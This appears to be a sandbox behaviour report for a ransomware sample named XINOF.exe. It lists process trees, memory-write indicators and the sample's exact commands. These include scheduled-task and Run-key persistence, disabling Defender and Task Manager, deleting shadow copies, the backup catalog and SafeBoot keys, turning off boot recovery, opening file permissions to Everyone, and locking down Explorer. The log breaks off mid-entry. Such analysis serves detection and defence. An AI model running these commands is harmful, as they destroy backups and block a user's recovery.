pid	process
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE
1156	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

XINOF.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1492 wrote to memory of 1016	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1016	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1016	1492	XINOF.exe	cmd.exe
PID 1016 wrote to memory of 388	1016	cmd.exe	schtasks.exe
PID 1016 wrote to memory of 388	1016	cmd.exe	schtasks.exe
PID 1016 wrote to memory of 388	1016	cmd.exe	schtasks.exe
PID 1492 wrote to memory of 112	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 112	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 112	1492	XINOF.exe	cmd.exe
PID 112 wrote to memory of 736	112	cmd.exe	reg.exe
PID 112 wrote to memory of 736	112	cmd.exe	reg.exe
PID 112 wrote to memory of 736	112	cmd.exe	reg.exe
PID 1492 wrote to memory of 1112	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1112	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1112	1492	XINOF.exe	cmd.exe
PID 1112 wrote to memory of 1036	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1036	1112	cmd.exe	reg.exe
PID 1112 wrote to memory of 1036	1112	cmd.exe	reg.exe
PID 1492 wrote to memory of 1032	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1032	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1032	1492	XINOF.exe	cmd.exe
PID 1032 wrote to memory of 1516	1032	cmd.exe	reg.exe
PID 1032 wrote to memory of 1516	1032	cmd.exe	reg.exe
PID 1032 wrote to memory of 1516	1032	cmd.exe	reg.exe
PID 1492 wrote to memory of 1508	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1508	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1508	1492	XINOF.exe	cmd.exe
PID 1508 wrote to memory of 1676	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1676	1508	cmd.exe	reg.exe
PID 1508 wrote to memory of 1676	1508	cmd.exe	reg.exe
PID 1492 wrote to memory of 1296	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1296	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1296	1492	XINOF.exe	cmd.exe
PID 1296 wrote to memory of 1784	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1784	1296	cmd.exe	reg.exe
PID 1296 wrote to memory of 1784	1296	cmd.exe	reg.exe
PID 1492 wrote to memory of 1768	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1768	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1768	1492	XINOF.exe	cmd.exe
PID 1768 wrote to memory of 1764	1768	cmd.exe	reg.exe
PID 1768 wrote to memory of 1764	1768	cmd.exe	reg.exe
PID 1768 wrote to memory of 1764	1768	cmd.exe	reg.exe
PID 1492 wrote to memory of 1844	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1844	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1844	1492	XINOF.exe	cmd.exe
PID 1844 wrote to memory of 1848	1844	cmd.exe	reg.exe
PID 1844 wrote to memory of 1848	1844	cmd.exe	reg.exe
PID 1844 wrote to memory of 1848	1844	cmd.exe	reg.exe
PID 1492 wrote to memory of 1884	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1884	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1884	1492	XINOF.exe	cmd.exe
PID 1884 wrote to memory of 1376	1884	cmd.exe	reg.exe
PID 1884 wrote to memory of 1376	1884	cmd.exe	reg.exe
PID 1884 wrote to memory of 1376	1884	cmd.exe	reg.exe
PID 1492 wrote to memory of 1692	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1692	1492	XINOF.exe	cmd.exe
PID 1492 wrote to memory of 1692	1492	XINOF.exe	cmd.exe
PID 1692 wrote to memory of 1508	1692	cmd.exe	cmd.exe
PID 1692 wrote to memory of 1508	1692	cmd.exe	cmd.exe
PID 1692 wrote to memory of 1508	1692	cmd.exe	cmd.exe
PID 1508 wrote to memory of 1384	1508	cmd.exe	icacls.exe
PID 1508 wrote to memory of 1384	1508	cmd.exe	icacls.exe
PID 1508 wrote to memory of 1384	1508	cmd.exe	icacls.exe
PID 1492 wrote to memory of 1768	1492	XINOF.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\XINOF.exe
"C:\Users\Admin\AppData\Local\Temp\XINOF.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/Fonix.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/Fonix.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
3⤵
- Adds Run key to start application
PID:736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
3⤵
- Adds Run key to start application
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
3⤵
- Adds Run key to start application
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
3⤵
- Adds Run key to start application
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:1784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:1384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
2⤵
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
2⤵
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
2⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
2⤵
PID:1892

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
3⤵
PID:1908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
2⤵
PID:1340

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
3⤵
PID:1920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
2⤵
PID:1864

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/
2⤵
PID:612

C:\Windows\system32\cmd.exe
cmd.exe /c vssadmin Delete Shadows /All /Quiet
3⤵
PID:1472

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
4⤵
- Interacts with shadow copies
PID:740

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} boostatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:1296

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:1776

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet/
3⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label D: XINOF
2⤵
PID:1920

C:\Windows\system32\label.exe
Label D: XINOF
3⤵
- Enumerates connected drives
PID:1824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label E: XINOF
2⤵
PID:1828

C:\Windows\system32\label.exe
Label E: XINOF
3⤵
- Enumerates connected drives
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label F: XINOF
2⤵
PID:292

C:\Windows\system32\label.exe
Label F: XINOF
3⤵
- Enumerates connected drives
PID:844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label G: XINOF
2⤵
PID:1504

C:\Windows\system32\label.exe
Label G: XINOF
3⤵
- Enumerates connected drives
PID:568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label H: XINOF
2⤵
PID:548

C:\Windows\system32\label.exe
Label H: XINOF
3⤵
- Enumerates connected drives
PID:808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label I: XINOF
2⤵
PID:1456

C:\Windows\system32\label.exe
Label I: XINOF
3⤵
- Enumerates connected drives
PID:1792

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label J: XINOF
2⤵
PID:296

C:\Windows\system32\label.exe
Label J: XINOF
3⤵
- Enumerates connected drives
PID:1352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label K: XINOF
2⤵
PID:820

C:\Windows\system32\label.exe
Label K: XINOF
3⤵
- Enumerates connected drives
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label L: XINOF
2⤵
PID:1648

C:\Windows\system32\label.exe
Label L: XINOF
3⤵
- Enumerates connected drives
PID:1156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label M: XINOF
2⤵
PID:1632

C:\Windows\system32\label.exe
Label M: XINOF
3⤵
- Enumerates connected drives
PID:1924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label N: XINOF
2⤵
PID:1796

C:\Windows\system32\label.exe
Label N: XINOF
3⤵
- Enumerates connected drives
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label A: XINOF
2⤵
PID:924

C:\Windows\system32\label.exe
Label A: XINOF
3⤵
- Enumerates connected drives
PID:1276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label B: XINOF
2⤵
PID:1600

C:\Windows\system32\label.exe
Label B: XINOF
3⤵
- Enumerates connected drives
PID:788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label O: XINOF
2⤵
PID:656

C:\Windows\system32\label.exe
Label O: XINOF
3⤵
- Enumerates connected drives
PID:1760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label P: XINOF
2⤵
PID:1112

C:\Windows\system32\label.exe
Label P: XINOF
3⤵
- Enumerates connected drives
PID:1636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Q: XINOF
2⤵
PID:1508

C:\Windows\system32\label.exe
Label Q: XINOF
3⤵
- Enumerates connected drives
PID:1872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label R: XINOF
2⤵
PID:1776

C:\Windows\system32\label.exe
Label R: XINOF
3⤵
- Enumerates connected drives
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label S: XINOF
2⤵
PID:1896

C:\Windows\system32\label.exe
Label S: XINOF
3⤵
- Enumerates connected drives
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label T: XINOF
2⤵
PID:1136

C:\Windows\system32\label.exe
Label T: XINOF
3⤵
- Enumerates connected drives
PID:576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label U: XINOF
2⤵
PID:1820

C:\Windows\system32\label.exe
Label U: XINOF
3⤵
- Enumerates connected drives
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label V: XINOF
2⤵
PID:1148

C:\Windows\system32\label.exe
Label V: XINOF
3⤵
- Enumerates connected drives
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label W: XINOF
2⤵
PID:1584

C:\Windows\system32\label.exe
Label W: XINOF
3⤵
- Enumerates connected drives
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label X: XINOF
2⤵
PID:1408

C:\Windows\system32\label.exe
Label X: XINOF
3⤵
- Enumerates connected drives
PID:1248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Y: XINOF
2⤵
PID:1808

C:\Windows\system32\label.exe
Label Y: XINOF
3⤵
- Enumerates connected drives
PID:432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label Z: XINOF
2⤵
PID:1212

C:\Windows\system32\label.exe
Label Z: XINOF
3⤵
- Enumerates connected drives
PID:296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Label C: XINOF
2⤵
PID:108

C:\Windows\system32\label.exe
Label C: XINOF
3⤵
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
2⤵
PID:1748

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
3⤵
PID:1332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
2⤵
PID:1060

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
3⤵
PID:1488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:788

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:656

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
2⤵
PID:1340

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
3⤵
PID:1136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
2⤵
PID:568

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
3⤵
PID:808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
2⤵
PID:1524

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
3⤵
PID:1672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
2⤵
PID:1740

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
3⤵
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
2⤵
PID:1700

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
3⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:916

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
2⤵
PID:1844

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
3⤵
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
2⤵
PID:1384

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
3⤵
PID:1912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
2⤵
PID:1776

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
3⤵
PID:1376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
2⤵
PID:1788

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
3⤵
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
2⤵
PID:576

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
3⤵
PID:1120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
2⤵
PID:1340

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
3⤵
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
2⤵
PID:1684

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
3⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
2⤵
PID:1108

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
3⤵
PID:1212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
2⤵
PID:1468

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
3⤵
PID:1328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
2⤵
PID:1416

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
3⤵
PID:1432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
2⤵
PID:432

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
3⤵
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
2⤵
PID:1352

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
3⤵
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
2⤵
PID:1744

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
3⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
2⤵
PID:316

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
3⤵
PID:1448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
2⤵
PID:1228

C:\Windows\system32\reg.exe
